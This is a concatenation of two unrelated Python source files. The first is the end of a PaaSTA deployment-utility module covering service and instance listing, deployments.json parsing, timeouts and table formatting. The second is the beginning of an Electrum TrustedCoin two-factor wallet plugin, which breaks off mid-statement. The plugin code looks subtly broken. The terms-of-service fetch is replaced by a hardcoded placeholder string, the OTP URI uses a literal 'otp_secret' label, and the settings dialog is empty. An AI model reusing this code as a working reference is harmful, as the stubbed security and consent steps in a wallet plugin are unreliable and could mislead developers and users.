"""Returns the current username in a portable way. Will use the SUDO_USER
environment variable if present.
http://stackoverflow.com/a/2899055
"""
return os.environ.get("SUDO_USER", pwd.getpwuid(os.getuid())[0])
def get_hostname() -> str:
"""Returns the fully-qualified domain name of the server this code is
running on.
"""
return socket.getfqdn()
def get_soa_cluster_deploy_files(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> Iterator[Tuple[str, str]]:
if service is None:
service = "*"
service_path = os.path.join(soa_dir, service)
valid_clusters = "|".join(load_system_paasta_config().get_clusters())
if instance_type in INSTANCE_TYPES:
instance_types = instance_type
else:
instance_types = "|".join(INSTANCE_TYPES)
search_re = r"/.*/(" + instance_types + r")-(" + valid_clusters + r")\.yaml$"
for yaml_file in glob.glob("%s/*.yaml" % service_path):
try:
with open(yaml_file):
cluster_re_match = re.search(search_re, yaml_file)
if cluster_re_match is not None:
cluster = cluster_re_match.group(2)
yield (cluster, yaml_file)
except IOError as err:
print(f"Error opening {yaml_file}: {err}")
def list_clusters(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> List[str]:
"""Returns a sorted list of clusters a service is configured to deploy to,
or all clusters if ``service`` is not specified.
Includes every cluster that has a ``marathon-*.yaml`` or ``tron-*.yaml`` file associated with it.
:param service: The service name. If unspecified, clusters running any service will be included.
:returns: A sorted list of cluster names
"""
clusters = set()
for cluster, _ in get_soa_cluster_deploy_files(
service=service, soa_dir=soa_dir, instance_type=instance_type
):
clusters.add(cluster)
return sorted(clusters)
def list_all_instances_for_service(
service: str,
clusters: Iterable[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
cache: bool = True,
) -> Set[str]:
instances = set()
if not clusters:
clusters = list_clusters(service, soa_dir=soa_dir)
for cluster in clusters:
if cache:
si_list = get_service_instance_list(
service, cluster, instance_type, soa_dir=soa_dir
)
else:
si_list = get_service_instance_list_no_cache(
service, cluster, instance_type, soa_dir=soa_dir
)
for service_instance in si_list:
instances.add(service_instance[1])
return instances
def get_tron_instance_list_from_yaml(
service: str, cluster: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
instance_list = []
try:
tron_config_content = load_tron_yaml(
service=service, cluster=cluster, soa_dir=soa_dir
)
except NoConfigurationForServiceError:
return []
jobs = extract_jobs_from_tron_yaml(config=tron_config_content)
for job_name, job in jobs.items():
action_names = get_action_names_from_job(job=job)
for name in action_names:
instance = f"{job_name}.{name}"
instance_list.append((service, instance))
return instance_list
def get_action_names_from_job(job: dict) -> Collection[str]:
# Warning: This duplicates some logic from TronActionConfig, but that class
# can't be imported here due to circular imports.
actions = job.get("actions", {})
if isinstance(actions, dict):
return list(actions.keys())
elif actions is None:
return []
else:
raise TypeError("Tron actions must be a dictionary")
def load_tron_yaml(service: str, cluster: str, soa_dir: str) -> Dict[str, Any]:
config = service_configuration_lib.read_extra_service_information(
service_name=service, extra_info=f"tron-{cluster}", soa_dir=soa_dir
)
if not config:
raise NoConfigurationForServiceError(
"No Tron configuration found for service %s" % service
)
return config
def extract_jobs_from_tron_yaml(config: Dict) -> Dict[str, Any]:
config = {
key: value for key, value in config.items() if not key.startswith("_")
} # filter templates
return config or {}
def get_instance_list_from_yaml(
service: str, conf_file: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
instance_list = []
instances = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir
)
for instance in instances:
if instance.startswith("_"):
log.debug(
f"Ignoring {service}.{instance} as instance name begins with '_'."
)
else:
instance_list.append((service, instance))
return instance_list
def get_pipeline_config(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> List[Dict]:
service_configuration = read_service_configuration(service, soa_dir)
return service_configuration.get("deploy", {}).get("pipeline", [])
def get_pipeline_deploy_groups(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> List[str]:
pipeline_steps = [step["step"] for step in get_pipeline_config(service, soa_dir)]
return [step for step in pipeline_steps if is_deploy_step(step)]
def get_service_instance_list_no_cache(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
instance_types: Tuple[str, ...]
if not cluster:
cluster = load_system_paasta_config().get_cluster()
if instance_type in INSTANCE_TYPES:
instance_types = (instance_type,)
else:
instance_types = INSTANCE_TYPES
instance_list: List[Tuple[str, str]] = []
for srv_instance_type in instance_types:
conf_file = f"{srv_instance_type}-{cluster}"
log.debug(
f"Enumerating all instances for config file: {soa_dir}/*/{conf_file}.yaml"
)
if srv_instance_type == "tron":
instance_list.extend(
get_tron_instance_list_from_yaml(
service=service, cluster=cluster, soa_dir=soa_dir
)
)
else:
instance_list.extend(
get_instance_list_from_yaml(
service=service, conf_file=conf_file, soa_dir=soa_dir
)
)
log.debug("Enumerated the following instances: %s", instance_list)
return instance_list
@time_cache(ttl=5)
def get_service_instance_list(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
return get_service_instance_list_no_cache(
service=service, cluster=cluster, instance_type=instance_type, soa_dir=soa_dir
)
def get_services_for_cluster(
cluster: str = None, instance_type: str = None, soa_dir: str = DEFAULT_SOA_DIR
) -> List[Tuple[str, str]]:
"""Retrieve all services and instances defined to run in a cluster.
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (service, instance)
"""
if not cluster:
cluster = load_system_paasta_config().get_cluster()
rootdir = os.path.abspath(soa_dir)
log.debug(
"Retrieving all service instance names from %s for cluster %s", rootdir, cluster
)
instance_list: List[Tuple[str, str]] = []
for srv_dir in os.listdir(rootdir):
service_instance_list = get_service_instance_list(
srv_dir, cluster, instance_type, soa_dir
)
for service_instance in service_instance_list:
service, instance = service_instance
if instance.startswith("_"):
log.debug(
f"Ignoring {service}.{instance} as instance name begins with '_'."
)
else:
instance_list.append(service_instance)
return instance_list
def parse_yaml_file(yaml_file: str) -> Any:
return yaml.safe_load(open(yaml_file))
def get_docker_host() -> str:
return os.environ.get("DOCKER_HOST", "unix://var/run/docker.sock")
def get_docker_client() -> Client:
client_opts = kwargs_from_env(assert_hostname=False)
if "base_url" in client_opts:
return Client(**client_opts)
else:
return Client(base_url=get_docker_host(), **client_opts)
def get_running_mesos_docker_containers() -> List[Dict]:
client = get_docker_client()
running_containers = client.containers()
return [
container
for container in running_containers
if "mesos-" in container["Names"][0]
]
class TimeoutError(Exception):
pass
class Timeout:
# From http://stackoverflow.com/questions/2281850/timeout-function-if-it-takes-too-long-to-finish
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum: int, frame: FrameType) -> None:
raise TimeoutError(self.error_message)
def __enter__(self) -> None:
self.old_handler = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
signal.alarm(0)
signal.signal(signal.SIGALRM, self.old_handler)
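# Illustrative use of the Timeout context manager above. It relies on
# SIGALRM, so it only works in the main thread on Unix-like systems; the
# wrapped call here is a placeholder.
#
#     try:
#         with Timeout(seconds=5, error_message="slow call"):
#             slow_network_call()
#     except TimeoutError:
#         handle_the_timeout()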
def print_with_indent(line: str, indent: int = 2) -> None:
"""Print a line with a given indent level"""
paasta_print(" " * indent + line)
class NoDeploymentsAvailable(Exception):
pass
def load_deployments_json(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> "DeploymentsJsonV1":
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
return DeploymentsJsonV1(json.load(f)["v1"])
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def load_v2_deployments_json(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> "DeploymentsJsonV2":
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
return DeploymentsJsonV2(service=service, config_dict=json.load(f)["v2"])
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
DeploymentsJsonV1Dict = Dict[str, BranchDictV1]
DeployGroup = str
BranchName = str
class _DeploymentsJsonV2ControlsDict(TypedDict, total=False):
force_bounce: Optional[str]
desired_state: str
class _DeploymentsJsonV2DeploymentsDict(TypedDict):
docker_image: str
git_sha: str
class DeploymentsJsonV2Dict(TypedDict):
deployments: Dict[DeployGroup, _DeploymentsJsonV2DeploymentsDict]
controls: Dict[BranchName, _DeploymentsJsonV2ControlsDict]
class DeploymentsJsonDict(TypedDict):
v1: DeploymentsJsonV1Dict
v2: DeploymentsJsonV2Dict
class DeploymentsJsonV1:
def __init__(self, config_dict: DeploymentsJsonV1Dict) -> None:
self.config_dict = config_dict
def get_branch_dict(self, service: str, branch: str) -> BranchDictV1:
full_branch = f"{service}:paasta-{branch}"
return self.config_dict.get(full_branch, {})
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, DeploymentsJsonV1)
and other.config_dict == self.config_dict
)
class DeploymentsJsonV2:
def __init__(self, service: str, config_dict: DeploymentsJsonV2Dict) -> None:
self.config_dict = config_dict
self.service = service
def get_branch_dict(
self, service: str, branch: str, deploy_group: str
) -> BranchDictV2:
full_branch = f"{service}:{branch}"
branch_dict: BranchDictV2 = {
"docker_image": self.get_docker_image_for_deploy_group(deploy_group),
"git_sha": self.get_git_sha_for_deploy_group(deploy_group),
"desired_state": self.get_desired_state_for_branch(full_branch),
"force_bounce": self.get_force_bounce_for_branch(full_branch),
}
return branch_dict
def get_deploy_groups(self) -> Collection[str]:
return self.config_dict["deployments"].keys()
def get_docker_image_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["docker_image"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_git_sha_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["git_sha"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_desired_state_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"desired_state", "start"
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_force_bounce_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"force_bounce", None
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_paasta_branch(cluster: str, instance: str) -> str:
return SPACER.join((cluster, instance))
def parse_timestamp(tstamp: str) -> datetime.datetime:
return datetime.datetime.strptime(tstamp, "%Y%m%dT%H%M%S")
def format_timestamp(dt: datetime.datetime = None) -> str:
if dt is None:
dt = datetime.datetime.utcnow()
return dt.strftime("%Y%m%dT%H%M%S")
def get_paasta_tag_from_deploy_group(identifier: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{identifier}-{timestamp}-{desired_state}"
def get_paasta_tag(cluster: str, instance: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{cluster}.{instance}-{timestamp}-{desired_state}"
def format_tag(tag: str) -> str:
return "refs/tags/%s" % tag
class NoDockerImageError(Exception):
pass
def get_config_hash(config: Any, force_bounce: str = None) -> str:
"""Create an MD5 hash of the configuration dictionary to be sent to
Marathon. Or anything really, so long as str(config) works. Returns
the first 8 characters so things are not really long.
:param config: The configuration to hash
:param force_bounce: a timestamp (in the form of a string) that is appended before hashing
that can be used to force a hash change
:returns: A MD5 hash of str(config)
"""
hasher = hashlib.md5()
hasher.update(
json.dumps(config, sort_keys=True).encode("UTF-8")
+ (force_bounce or "").encode("UTF-8")
)
return "config%s" % hasher.hexdigest()[:8]
def get_git_sha_from_dockerurl(docker_url: str) -> str:
parts = docker_url.split("/")
parts = parts[-1].split("-")
return parts[-1][:8]
def get_code_sha_from_dockerurl(docker_url: str) -> str:
"""We encode the sha of the code that built a docker image *in* the docker
url. This function takes that url as input and outputs the partial sha
"""
try:
git_sha = get_git_sha_from_dockerurl(docker_url)
return "git%s" % git_sha
except Exception:
return "gitUNKNOWN"
def is_under_replicated(
num_available: int, expected_count: int, crit_threshold: int
) -> Tuple[bool, float]:
"""Calculates if something is under replicated
:param num_available: How many things are up
:param expected_count: How many things you think should be up
:param crit_threshold: Int from 0-100
:returns: Tuple of (bool, ratio)
"""
if expected_count == 0:
ratio = 100.0
else:
ratio = (num_available / float(expected_count)) * 100
if ratio < int(crit_threshold):
return (True, ratio)
else:
return (False, ratio)
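# Worked example for is_under_replicated: 1 of 4 expected tasks up is a 25%
# ratio, which is below a 50% critical threshold, so the service is flagged
# as under-replicated.
#
#     is_under_replicated(num_available=1, expected_count=4, crit_threshold=50)
#         -> (True, 25.0)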
def deploy_blacklist_to_constraints(
deploy_blacklist: DeployBlacklist,
) -> List[Constraint]:
"""Converts a blacklist of locations into marathon appropriate constraints.
https://mesosphere.github.io/marathon/docs/constraints.html#unlike-operator
:param blacklist: List of lists of locations to blacklist
:returns: List of lists of constraints
"""
constraints: List[Constraint] = []
for blacklisted_location in deploy_blacklist:
constraints.append([blacklisted_location[0], "UNLIKE", blacklisted_location[1]])
return constraints
def deploy_whitelist_to_constraints(
deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Converts a whitelist of locations into marathon appropriate constraints
https://mesosphere.github.io/marathon/docs/constraints.html#like-operator
:param deploy_whitelist: List of lists of locations to whitelist
:returns: List of lists of constraints
"""
if deploy_whitelist is not None:
(region_type, regions) = deploy_whitelist
regionstr = "|".join(regions)
return [[region_type, "LIKE", regionstr]]
return []
def terminal_len(text: str) -> int:
"""Return the number of characters that text will take up on a terminal. """
return len(remove_ansi_escape_sequences(text))
def format_table(
rows: Iterable[Union[str, Sequence[str]]], min_spacing: int = 2
) -> List[str]:
"""Formats a table for use on the command line.
:param rows: List of rows, each of which can either be a tuple of strings containing the row's values, or a string
to be inserted verbatim. Each row (except literal strings) should have the same number of elements as
all the others.
:returns: A list of strings, one per row, formatted as a table.
"""
list_rows = [r for r in rows if not isinstance(r, str)]
# If all of the rows are strings, we have nothing to do, so short-circuit.
if not list_rows:
return cast(List[str], rows)
widths = []
for i in range(len(list_rows[0])):
widths.append(max(terminal_len(r[i]) for r in list_rows))
expanded_rows = []
for row in rows:
if isinstance(row, str):
expanded_rows.append([row])
else:
expanded_row = []
for i, cell in enumerate(row):
if i == len(row) - 1:
padding = ""
else:
padding = " " * (widths[i] - terminal_len(cell))
expanded_row.append(cell + padding)
expanded_rows.append(expanded_row)
return [(" " * min_spacing).join(r) for r in expanded_rows]
_DeepMergeT = TypeVar("_DeepMergeT", bound=Any)
class DuplicateKeyError(Exception):
pass
def deep_merge_dictionaries(
overrides: _DeepMergeT, defaults: _DeepMergeT, allow_duplicate_keys: bool = True
) -> _DeepMergeT:
"""
Merges two dictionaries.
"""
result = copy.deepcopy(defaults)
stack: List[Tuple[Dict, Dict]] = [(overrides, result)]
while stack:
source_dict, result_dict = stack.pop()
for key, value in source_dict.items():
try:
child = result_dict[key]
except KeyError:
result_dict[key] = value
else:
if isinstance(value, dict) and isinstance(child, dict):
stack.append((value, child))
else:
if allow_duplicate_keys:
result_dict[key] = value
else:
raise DuplicateKeyError(
f"defaults and overrides both have key {key}"
)
return result
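# Worked example for deep_merge_dictionaries: nested dicts are merged key by
# key, with values from `overrides` winning on conflicts when
# allow_duplicate_keys is True (the default):
#
#     deep_merge_dictionaries(overrides={"a": {"b": 2}},
#                             defaults={"a": {"b": 1, "c": 3}})
#         -> {"a": {"b": 2, "c": 3}}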
class ZookeeperPool:
"""
A context manager that shares the same KazooClient with its children. The first nested context manager
creates and deletes the client and shares it with any of its children. This allows placing a context
manager over a large number of zookeeper calls without opening and closing a connection each time.
GIL makes this 'safe'.
"""
counter: int = 0
zk: KazooClient = None
@classmethod
def __enter__(cls) -> KazooClient:
if cls.zk is None:
cls.zk = KazooClient(
hosts=load_system_paasta_config().get_zk_hosts(), read_only=True
)
cls.zk.start()
cls.counter = cls.counter + 1
return cls.zk
@classmethod
def __exit__(cls, *args: Any, **kwargs: Any) -> None:
cls.counter = cls.counter - 1
if cls.counter == 0:
cls.zk.stop()
cls.zk.close()
cls.zk = None
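# Sketch of how ZookeeperPool is intended to be used (the ZK path is a
# placeholder). Nested `with` blocks share a single read-only KazooClient,
# which is only closed once the outermost block exits:
#
#     with ZookeeperPool() as zk:
#         data, _stat = zk.get("/some/zk/path")
#         with ZookeeperPool():   # reuses the same client
#             ...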
def calculate_tail_lines(verbose_level: int) -> int:
if verbose_level <= 1:
return 0
else:
return 10 ** (verbose_level - 1)
def is_deploy_step(step: str) -> bool:
"""
Returns true if the given step deploys to an instancename
Returns false if the step is a predefined step-type, e.g. itest or command-*
"""
return not (
(step in DEPLOY_PIPELINE_NON_DEPLOY_STEPS) or (step.startswith("command-"))
)
_UseRequestsCacheFuncT = TypeVar("_UseRequestsCacheFuncT", bound=Callable)
def use_requests_cache(
cache_name: str, backend: str = "memory", **kwargs: Any
) -> Callable[[_UseRequestsCacheFuncT], _UseRequestsCacheFuncT]:
def wrap(fun: _UseRequestsCacheFuncT) -> _UseRequestsCacheFuncT:
def fun_with_cache(*args: Any, **kwargs: Any) -> Any:
requests_cache.install_cache(cache_name, backend=backend, **kwargs)
result = fun(*args, **kwargs)
requests_cache.uninstall_cache()
return result
return cast(_UseRequestsCacheFuncT, fun_with_cache)
return wrap
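# Illustrative use of the use_requests_cache decorator (the cache name,
# function and URL are placeholders): HTTP requests made inside the decorated
# call go through a requests_cache backend that is installed before the call
# and uninstalled afterwards.
#
#     @use_requests_cache("example_cache", backend="memory")
#     def fetch_something():
#         return requests.get("http://example.com/api").json()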
def long_job_id_to_short_job_id(long_job_id: str) -> str:
service, instance, _, __ = decompose_job_id(long_job_id)
return compose_job_id(service, instance)
def mean(iterable: Collection[float]) -> float:
"""
Returns the average value of an iterable
"""
return sum(iterable) / len(iterable)
def prompt_pick_one(sequence: Collection[str], choosing: str) -> str:
if not sys.stdin.isatty():
paasta_print(
"No {choosing} specified and no TTY present to ask."
"Please specify a {choosing} using the cli.".format(choosing=choosing),
file=sys.stderr,
)
sys.exit(1)
if not sequence:
paasta_print(
f"PaaSTA needs to pick a {choosing} but none were found.", file=sys.stderr
)
sys.exit(1)
global_actions = [str("quit")]
choices = [(item, item) for item in sequence]
if len(choices) == 1:
return choices[0][0]
chooser = choice.Menu(choices=choices, global_actions=global_actions)
chooser.title = 'Please pick a {choosing} from the choices below (or "quit" to quit):'.format(
choosing=str(choosing)
)
try:
result = chooser.ask()
except (KeyboardInterrupt, EOFError):
paasta_print("")
sys.exit(1)
if isinstance(result, tuple) and result[1] == str("quit"):
sys.exit(1)
else:
return result
def to_bytes(obj: Any) -> bytes:
if isinstance(obj, bytes):
return obj
elif isinstance(obj, str):
return obj.encode("UTF-8")
else:
return str(obj).encode("UTF-8")
TLS = threading.local()
@contextlib.contextmanager
def set_paasta_print_file(file: Any) -> Iterator[None]:
TLS.paasta_print_file = file
yield
TLS.paasta_print_file = None
def paasta_print(*args: Any, **kwargs: Any) -> None:
f = kwargs.pop("file", sys.stdout) or sys.stdout
f = getattr(TLS, "paasta_print_file", f) or f
buf = getattr(f, "buffer", None)
# Here we're assuming that the file object works with strings and its
# `buffer` works with bytes. So, if the file object doesn't have `buffer`,
# we output via the file object itself using strings.
obj_to_arg: Callable[[Any], Any]
if buf is not None:
f = buf
obj_to_arg = to_bytes
else:
def obj_to_arg(o: Any) -> str:
return to_bytes(o).decode("UTF-8", errors="ignore")
end = obj_to_arg(kwargs.pop("end", "\n"))
sep = obj_to_arg(kwargs.pop("sep", " "))
assert not kwargs, kwargs
to_print = sep.join(obj_to_arg(x) for x in args) + end
f.write(to_print)
f.flush()
_TimeoutFuncRetType = TypeVar("_TimeoutFuncRetType")
def timeout(
seconds: int = 10,
error_message: str = os.strerror(errno.ETIME),
use_signals: bool = True,
) -> Callable[[Callable[..., _TimeoutFuncRetType]], Callable[..., _TimeoutFuncRetType]]:
if use_signals:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
def _handle_timeout(signum: int, frame: FrameType) -> None:
raise TimeoutError(error_message)
def wrapper(*args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
else:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
# https://github.com/python/mypy/issues/797
return _Timeout(func, seconds, error_message) # type: ignore
return decorate
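# Illustrative use of the timeout decorator above. With use_signals=True (the
# default) it relies on SIGALRM and must run in the main thread; with
# use_signals=False the call is executed on a daemon thread via _Timeout.
#
#     @timeout(seconds=30)
#     def wait_for_deployment():
#         ...   # raises TimeoutError if it takes longer than 30 seconds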
class _Timeout:
def __init__(
self,
function: Callable[..., _TimeoutFuncRetType],
seconds: float,
error_message: str,
) -> None:
self.seconds = seconds
self.control: queue.Queue[
Tuple[bool, Union[_TimeoutFuncRetType, Tuple]]
] = queue.Queue()
self.function = function
self.error_message = error_message
def run(self, *args: Any, **kwargs: Any) -> None:
# Try and put the result of the function into the q
# if an exception occurs then we put the exc_info instead
# so that it can be raised in the main thread.
try:
self.control.put((True, self.function(*args, **kwargs)))
except Exception:
self.control.put((False, sys.exc_info()))
def __call__(self, *args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
self.func_thread = threading.Thread(target=self.run, args=args, kwargs=kwargs)
self.func_thread.daemon = True
self.timeout = self.seconds + time.time()
self.func_thread.start()
return self.get_and_raise()
def get_and_raise(self) -> _TimeoutFuncRetType:
while not self.timeout < time.time():
time.sleep(0.01)
if not self.func_thread.is_alive():
ret = self.control.get()
if ret[0]:
return cast(_TimeoutFuncRetType, ret[1])
else:
_, e, tb = cast(Tuple, ret[1])
raise e.with_traceback(tb)
raise TimeoutError(self.error_message)
def suggest_possibilities(
word: str, possibilities: Iterable[str], max_suggestions: int = 3
) -> str:
suggestions = cast(
List[str],
difflib.get_close_matches(
word=word, possibilities=set(possibilities), n=max_suggestions
),
)
if len(suggestions) == 1:
return f"\nDid you mean: {suggestions[0]}?"
elif len(suggestions) >= 1:
return f"\nDid you mean one of: {', '.join(suggestions)}?"
else:
return ""
def list_services(soa_dir: str = DEFAULT_SOA_DIR) -> Sequence[str]:
"""Returns a sorted list of all services"""
return sorted(os.listdir(os.path.abspath(soa_dir)))
def get_possible_launched_by_user_variable_from_env() -> str:
return os.getenv("SUDO_USER") or getpass.getuser()
def load_all_configs(
cluster: str, file_prefix: str, soa_dir: str
) -> Mapping[str, Mapping[str, Any]]:
config_dicts = {}
for service in os.listdir(soa_dir):
config_dicts[
service
] = service_configuration_lib.read_extra_service_information(
service, f"{file_prefix}-{cluster}", soa_dir=soa_dir
)
return config_dicts
|
qt.py
|
from .tc_plugins import TCPlugin
from .tools import TOS, HandlerTwoFactor
from .tc_requests import tc_requests
import os
import sys
import threading
from functools import partial
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QLabel, QGridLayout, QHBoxLayout, QRadioButton, QCheckBox, QLineEdit)
from electrum.plugin import hook
from electrum.i18n import _
from electrum.util import is_valid_email
from electrum.gui.qt.util import (read_QIcon, WindowModalDialog, WaitingDialog, OkButton, CancelButton, Buttons,
icon_path, WWLabel, CloseButton, EnterButton, HelpLabel)
from electrum.gui.qt.amountedit import AmountEdit
from electrum.gui.qt.qrcodewidget import QRCodeWidget
from electrum.gui.qt.installwizard import InstallWizard
from electrum.gui.qt.main_window import StatusBarButton
from electrum.base_wizard import GoBack
class Plugin(TCPlugin):
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
def requires_settings(self):
# Return True to add a Settings button.
return True
def settings_widget(self, window):
# Return a button that when pressed presents a settings dialog.
return EnterButton(_('Settings'), partial(self.settings_dialog, window))
def settings_dialog(self, window):
# Return a settings dialog.
d = WindowModalDialog(window, _("Email settings"))
vbox = QVBoxLayout(d)
d.setMinimumSize(500, 200)
vbox.addStretch()
vbox.addLayout(Buttons(CloseButton(d), OkButton(d)))
d.show()
def accept_terms_of_use(self, window):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Terms of Service")))
tos_e = TOS()
tos_e.setReadOnly(True)
vbox.addWidget(tos_e)
tos_received = False
vbox.addWidget(QLabel(_("Please enter your e-mail address")))
email_e = QLineEdit()
vbox.addWidget(email_e)
next_button = window.next_button
prior_button_text = next_button.text()
next_button.setText(_('Accept'))
def request_TOS():
self.TOS = '====================================ABC'
tos_e.tos_signal.emit()
def on_result():
tos_e.setText(self.TOS)
nonlocal tos_received
tos_received = True
set_enabled()
def on_error(msg):
window.show_error(str(msg))
window.terminate()
def set_enabled():
next_button.setEnabled(tos_received and is_valid_email(email_e.text()))
tos_e.tos_signal.connect(on_result)
tos_e.error_signal.connect(on_error)
t = threading.Thread(target=request_TOS)
t.daemon = True
t.start()
email_e.textChanged.connect(set_enabled)
email_e.setFocus(True)
window.exec_layout(vbox, next_enabled=False)
next_button.setText(prior_button_text)
email = str(email_e.text())
self.create_remote_key(email, window)
def request_otp_dialog(self, window, short_id, otp_secret, xpub3):
vbox = QVBoxLayout()
if otp_secret is not None:
uri = "otpauth://hotp/%s?secret=%s" % ('otp_secret', otp_secret)
l = QLabel(
"Please scan the following QR code in Google Authenticator. You may as well use the following key: %s" % otp_secret)
l.setWordWrap(True)
vbox.addWidget(l)
qrw = QRCodeWidget(uri)
vbox.addWidget(qrw, 1)
msg = _('Then, enter your Google Authenticator code:')
else:
label = QLabel(
"This wallet is already registered with TrustedCoin. "
"To finalize wallet creation, please enter your Google Authenticator Code. "
)
label.setWordWrap(1)
vbox.addWidget(label)
msg = _('Google Authenticator code:')
hbox = QHBoxLayout()
hbox.addWidget(WWLabel(msg))
pw = AmountEdit(None, is_int=True)
pw.setFocus(True)
pw.setMaximumWidth(50)
hbox.addWidget(pw)
vbox.addLayout(hbox)
cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
vbox.addWidget(cb_lost)
cb_lost.setVisible(otp_secret is None)
def set_enabled():
b = True if cb_lost.isChecked() else len(pw.text()) == 6
window.next_button.setEnabled(b)
pw.textChanged.connect(set_enabled)
cb_lost.toggled.connect(set_enabled)
window.exec_layout(vbox, next_enabled=False, raise_on_cancel=False)
self.check_otp(window, short_id, otp_secret, xpub3, pw.get_amount(), cb_lost.isChecked())
@hook
def abort_send(self, window):
""" Called when the abort dialog is displayed prior to broadcasting a transaction.
Args:
window: electrum_gui.qt.main_window.ElectrumWindow
"""
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
self.waiting_dialog_for_billing_info(window)
return True
return False
def waiting_dialog_for_billing_info(self, window, *, on_finished=None):
def task():
return self.request_billing_info(window.wallet, suppress_connection_error=False)
def on_error(exc_info):
e = exc_info[1]
window.show_error("{header}\n{exc}\n\n{tor}"
.format(header=_('Error getting TrustedCoin account info.'),
exc=str(e),
tor=_('If you keep experiencing network problems, try using a Tor proxy.')))
return WaitingDialog(parent=window,
message=_('Requesting account info from TrustedCoin server...'),
task=task,
on_success=on_finished,
on_error=on_error)
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
wallet.handler_2fa.prompt_user_for_otp(wallet, tx, on_success, on_failure)
@hook
def on_new_window(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
wallet.handler_2fa = HandlerTwoFactor(self, window)
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(read_QIcon("tc.jpeg"),
_("TC"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
pw = AmountEdit(None, is_int=True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _(
'If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
def go_online_dialog(self, wizard: InstallWizard):
msg = [
